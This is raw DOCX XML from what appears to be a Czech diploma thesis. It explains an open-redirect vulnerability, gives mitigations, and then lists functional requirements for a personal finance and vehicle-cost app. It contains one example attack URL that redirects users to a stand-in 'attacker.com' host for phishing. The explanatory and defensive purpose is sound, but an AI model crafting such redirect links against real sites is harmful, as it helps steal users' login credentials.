        <w:t>V aplikaci existuje stránka, která provede přesměrování na adresu zadanou jako URL parametr. Vzhledem k tomu, že stránka neprovádí žádnou kontrolu této adresy, může útočník parametr podvrhnout a přesměrovat uživatele na svoji útočnou stránku:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRPr="00AF3147" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>http://www.example.com/redirect?url=attacker.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="007F5BF2">
      <w:r>
        <w:t>Takový odkaz se pro uživatele tváří věrohodně, protože směřuje na jemu známou doménu, takže jej s větší pravděpodobností otevře, čímž se ve skutečnosti dostane na stránky útočníka. Ten na své doméně může například provozovat kopii originálního webu za</w:t>
      </w:r>
      <w:r w:rsidR="00971E5F">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">účelem sběru přihlašovacích údajů (tzv. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00971E5F">
        <w:t>phishi</w:t>
      </w:r>
      <w:r w:rsidR="00347203" w:rsidRPr="00971E5F">
        <w:t>ng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="004B453A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc387327839"/>
      <w:r>
        <w:t>Jak předcházet této zranitelnosti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Jestliže je to možné, přesměrování se vyhnout. Pokud je přesměrování nezbytné, nesmí parametry požadavku ovlivnit adresu, na kterou přesměrování proběhne. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F5BF2" w:rsidRDefault="007F5BF2" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Když je nutné předávat adresu výsledné stránky v parametrech, je třeba tuto adresu validovat, například pomocí seznamu povolených adres. V případě, kdy není možné vytvořit tento seznam, lze například využít asymetrické kryptografie. URL parametry jsou podepsány privátním klíčem a stránka provádějící přesměrování kontroluje pomocí veřejného klíče, jestli nejsou podepsaná data podvrhnuta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007F0535" w:rsidRDefault="004D2639" w:rsidP="007F0535">
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344909"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION pTgcSb2b8rOKPaB2 \p 16 \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[10, s. 16]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8787" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2480"/>
        <w:gridCol w:w="6307"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C94493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2480" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="st-slice"/>
              <w:suppressAutoHyphens/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6307" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="st"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:bookmarkStart w:id="108" w:name="_Toc387327840"/>
            <w:r>
              <w:t>Praktická část</w:t>
            </w:r>
            <w:bookmarkEnd w:id="108"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00F3033A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc387327841"/>
      <w:bookmarkStart w:id="110" w:name="_Toc107634149"/>
      <w:bookmarkStart w:id="111" w:name="_Toc107635184"/>
      <w:bookmarkStart w:id="112" w:name="_Toc107635224"/>
      <w:bookmarkStart w:id="113" w:name="_Toc107635241"/>
      <w:bookmarkStart w:id="114" w:name="_Toc107634150"/>
      <w:bookmarkStart w:id="115" w:name="_Toc107635185"/>
      <w:bookmarkStart w:id="116" w:name="_Toc107635225"/>
      <w:bookmarkStart w:id="117" w:name="_Toc107635242"/>
      <w:bookmarkStart w:id="118" w:name="_Toc107986423"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>funkcionalita aplikace</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w:rsidR="00F3033A" w:rsidRDefault="00142295" w:rsidP="00F3033A">
      <w:r>
        <w:t>Cílem této diplomové práce je navrhnout vlastní řešení aplikace pro správu financí s přihlédnutím k existujícím řešením. V této kapitole budou specifikovány požadavky na funkcionalitu aplikace.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00142295" w:rsidRDefault="00142295" w:rsidP="00142295">
      <w:pPr>
        <w:pStyle w:val="Nadpis2"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc387327842"/>
      <w:r>
        <w:t>Funkční požadavky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00971737" w:rsidP="00971737">
      <w:r>
        <w:t xml:space="preserve">Neformální funkční požadavky jsou pro přehlednost rozděleny </w:t>
      </w:r>
      <w:r w:rsidR="005B0FF2">
        <w:t xml:space="preserve">podle </w:t>
      </w:r>
      <w:r w:rsidR="00155901">
        <w:t>modulů</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00971737" w:rsidP="00971737">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="120" w:name="_Toc387327843"/>
      <w:r>
        <w:t>Uživatelé</w:t>
      </w:r>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00971737" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatelé aplikace se budou moci sami volně registrovat a přihlašovat. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00971737" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Každý uživatel bude identifikován svým unikátním uživatelským jménem, pro </w:t>
      </w:r>
      <w:r w:rsidR="00923E61">
        <w:t>ověření</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bude použito heslo.</w:t>
      </w:r>
      <w:r w:rsidR="004059F9">
        <w:t xml:space="preserve"> Volitelně bude moci uživatel vyplnit i svoji emailovou adresu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00971737" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>V aplikaci budou existovat dvě uživatelské role – běžný uživatel a správce. Běžný uživatel bude spravovat</w:t>
      </w:r>
      <w:r w:rsidR="004059F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>svá data a bude moci sám odstranit svůj vlastní účet. Uživatel s rolí správce bude spravovat uživatele v</w:t>
      </w:r>
      <w:r w:rsidR="004059F9">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>systému</w:t>
      </w:r>
      <w:r w:rsidR="004059F9">
        <w:t>, konkrétně bude moci odstranit libovolného uživatele ze systému, ale nebude moci prohlížet data jiných uživatelů.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004059F9" w:rsidRPr="00971737" w:rsidRDefault="004059F9" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Pokud uživatel zapomněl své přihlašovací heslo a poskytl emailovou adresu, tak si bude moci zažádat o vytvoření nového hesla. Na zaregistrovanou emailovou adresu mu přijde odkaz pomocí kterého si bude moci vytvořit nové heslo. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRPr="00971737" w:rsidRDefault="00971737" w:rsidP="00971737">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc387327844"/>
      <w:r>
        <w:t>Správa účtů</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
    </w:p>
    <w:p w:rsidR="00142295" w:rsidRDefault="00971737" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace bude umožňovat správu více účtů (hotovost bude možné vést jako jeden z účtů).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00971737" w:rsidRDefault="00741B2B" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Všechny </w:t>
      </w:r>
      <w:r w:rsidR="00971737">
        <w:t>účt</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="00971737">
        <w:t xml:space="preserve"> bud</w:t>
      </w:r>
      <w:r>
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="00971737">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006352EA">
        <w:t>vedeny ve stejné</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> měně</w:t>
      </w:r>
      <w:r w:rsidR="00971737">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004059F9" w:rsidRDefault="004059F9" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Počet účtu nebude nijak omezen a uživatel si je bude moci volně vytvářet, upravovat i </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t>odstraňovat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C3D49" w:rsidRDefault="008C3D49" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mezi účty bude možné jednoduše převádět prostředky aniž by byly zkresleny statistiky (převod mezi vlastními účty nebude evidován jako výdaj a příjem).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002843C5" w:rsidRDefault="002843C5" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel si bude moci zobrazit přehled aktuálního stavu prostředků na jednotlivých účtech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C3D49" w:rsidRDefault="008C3D49" w:rsidP="008C3D49">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="122" w:name="_Toc387327845"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Správa transakcí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="122"/>
    </w:p>
    <w:p w:rsidR="005327AE" w:rsidRDefault="00D56ACD" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Uživatelé budou pomocí aplikace evidovat své příjmy a výdaje (obecně transakce). Každá transakce bude přiřazena k jednomu z účtů, případně ke dvěma pokud půjde o převod prostředků mezi účty. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56ACD" w:rsidRDefault="00D56ACD" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>U transakce bude evidována nominální částka, datum uskutečnění transakce a volitelně její popis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56ACD" w:rsidRDefault="00D56ACD" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Transakce budou rozlišeny pomocí </w:t>
      </w:r>
      <w:r w:rsidR="00692937">
        <w:t>štítků, přičemž jeden</w:t>
      </w:r>
      <w:r w:rsidR="00EE1425">
        <w:t xml:space="preserve"> z nich bude</w:t>
      </w:r>
      <w:r w:rsidR="00692937">
        <w:t xml:space="preserve"> hlavní kategorizační štítek transakce. Volitelně bude možné transakci navíc označit i dalšími upřesňujícími štítky.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00692937" w:rsidRDefault="00692937" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Štítky se budou vytvářet dynamicky při jejich prvním použití. Vytvořený štítek se bude uživateli nabízet při označování dalších transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00692937" w:rsidRDefault="00692937" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel bude moci spravovat své vytvořené štítky, bude je moci přejmenovat nebo smazat (</w:t>
      </w:r>
      <w:r w:rsidR="00EE1425">
        <w:t>transakce označené smazaným štítkem v systému zůstanou, odstraní se pouze jejich označení</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00692937" w:rsidRDefault="00692937" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel si bude moci zobrazit všechny své evidované transakce ve zvoleném časovém období, standardně se budou zobrazovat transakce za posledních 30 dní. Transakce bude možn</w:t>
      </w:r>
      <w:r w:rsidR="00360F48">
        <w:t>é filtrovat podle účtů a štítků.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00692937" w:rsidRDefault="00692937" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Evidovanou transakci bude možné upravit nebo smazat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0060583A" w:rsidRDefault="0060583A" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Bude možné vytvářet automaticky opakované transakce s denní, týdenní a měsíční frekvencí opakování.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005263A3" w:rsidRDefault="005263A3" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Každou evidovanou transakci bude možné rozdělit do více samostatných transakcí.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00360F48" w:rsidRDefault="00A20B28" w:rsidP="00360F48">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc387327846"/>
      <w:r>
        <w:t>Statistiky</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w:rsidR="00741B2B" w:rsidRDefault="00E568A5" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Graf vývoje příjmů, výdajů a bilance v časovém intervalu, který si uživatel zvolí</w:t>
      </w:r>
      <w:r w:rsidR="00741B2B">
        <w:t>. Příjmy a výdaje budou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> agregované buď po dnech, týdnech, měsících a nebo letech. </w:t>
      </w:r>
      <w:r w:rsidR="00741B2B">
        <w:t>V případě bilance bude použit stav účtu po poslední transakci v daném agregovaném období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E568A5" w:rsidRDefault="00E568A5" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Graf </w:t>
      </w:r>
      <w:r w:rsidR="00183371">
        <w:t>vývoje příjmů a výdajů označených zvolenými štítky v časovém intervalu, který si uživatel určí. Příjmy a výdaje budou agregované buď po dnech, týdnech, měsících</w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00183371">
        <w:t xml:space="preserve"> nebo letech.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00183371" w:rsidRDefault="00183371" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Koláčový graf podílu jednotlivých hlavních kategorizačních štítků na celkových výdajích za zvolené časové období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00183371" w:rsidRDefault="00183371" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sloupcový graf podílu jednotlivých štít</w:t>
      </w:r>
      <w:r w:rsidR="00020C69">
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>ů na celkových výdajích za zvolené časové období.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20B28" w:rsidRDefault="00A20B28" w:rsidP="00A20B28">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc387327847"/>
      <w:r>
        <w:t>Plánování</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w:rsidR="00020C69" w:rsidRDefault="00A04597" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel si b</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>de moci definovat výdajové rozpočty. Každý rozpočet bude mít zadanou částku, popis, o</w:t>
      </w:r>
      <w:r w:rsidR="00216F1C">
        <w:t>bdobí platnosti a volitelný</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seznam štítků, na které se vztahuje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04597" w:rsidRDefault="00A04597" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Jednorázový rozpočet bude mít explicitně zadané období. Další možností bude pravidelný rozpočet (týdenní, měsíční, roční) se stanoveným startovacím datem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04597" w:rsidRDefault="00A04597" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Uživatel bude graficky informován o plnění rozpočtu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20B28" w:rsidRDefault="00A20B28" w:rsidP="00A20B28">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc387327848"/>
      <w:r>
        <w:t xml:space="preserve">Správa </w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t>vozidla</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w:rsidR="00120209" w:rsidRDefault="009C57E7" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace umožní uživateli pokročilé sledování výdajů za vozidlo. Uživatel si bude moci definovat libovolný počet vozidel. Každé vozidlo bude mít svůj název, podle kterého jej bude uživatel identifikovat. Vozidla bude možné vytvářet, upravovat a </w:t>
      </w:r>
      <w:r w:rsidR="00981FE8">
        <w:t>odstraňovat</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C57E7" w:rsidRDefault="009C57E7" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Po vytvoření vozidla se uživateli automaticky vytvoří štítek s jeho názvem, pomocí kterého bude moci označovat transakce související s daným vozidlem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F55FD6" w:rsidRDefault="00120209" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Při zadávání transakce bude možné</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>přiřadit k ní operaci tankování pohonných hmot.</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t xml:space="preserve"> Pokud uživatel </w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t>tuto</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t xml:space="preserve"> možnost zvolí, bude muset kromě částky zadat také buď cenu za litr pohonné hmoty</w:t>
      </w:r>
      <w:r w:rsidR="003F218B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009C57E7">
        <w:t xml:space="preserve"> nebo počet natankovaných litrů. Po zadání jedné z těchto hodnot se druhá dopočítá. Dále bude uživatel muset označit transakci štítkem jednoho ze svých vozidel</w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F97757">
        <w:t>a vybrat, zda se jedná o natankování plné nádrže</w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t xml:space="preserve"> (v tom případě uživatel zadá i stav tachometru vozidla)</w:t>
      </w:r>
      <w:r w:rsidR="00F97757">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97757" w:rsidRDefault="00DF00FB" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace bude zobrazovat vypočítanou průměrnou spotřebu vozidla mezi jednotlivým tankováním do plné nádrže a dále celkovou průměrnou spotřebu za vybrané období. Tento údaj bude dostupný pouze v případě, že se v daném období uskutečnily minimálně dvě tankování do plné nádrže.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF00FB" w:rsidRDefault="00DF00FB" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Aplikace bude zobrazovat vývoj ceny pohonných hmot</w:t>
      </w:r>
      <w:r w:rsidR="000A4808">
        <w:t xml:space="preserve"> a kilometrového nájezdu vozidla </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dle </w:t>
      </w:r>
      <w:r w:rsidR="003F218B">
        <w:t>evidovaných</w:t>
      </w:r>
      <w:r w:rsidR="000A4808">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C35816">
        <w:t>tankování</w:t>
      </w:r>
      <w:r w:rsidR="000A4808">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF00FB" w:rsidRPr="00F55FD6" w:rsidRDefault="00DF00FB" w:rsidP="00F12417">
      <w:pPr>
        <w:pStyle w:val="Odstavecseseznamem"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dále bude možné zobrazit průměrnou cenu za kilometr </w:t>
      </w:r>
      <w:r w:rsidR="003F218B">
        <w:t>ve</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vybrané</w:t>
      </w:r>
      <w:r w:rsidR="003F218B">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> období. Do průměrné ceny bude možné zahrnou</w:t>
      </w:r>
      <w:r w:rsidR="003F218B">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jak pohonné hmoty, tak i další výdaje spojené s</w:t>
      </w:r>
      <w:r w:rsidR="00B85856">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>vozidlem</w:t>
      </w:r>
      <w:r w:rsidR="00B85856">
        <w:t xml:space="preserve"> na základě transakcí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> označen</w:t>
      </w:r>
      <w:r w:rsidR="00B85856">
        <w:t>ých</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jeho štítkem.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A20B28" w:rsidRDefault="00A20B28" w:rsidP="00A20B28">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc387327849"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Import a export dat</w:t>
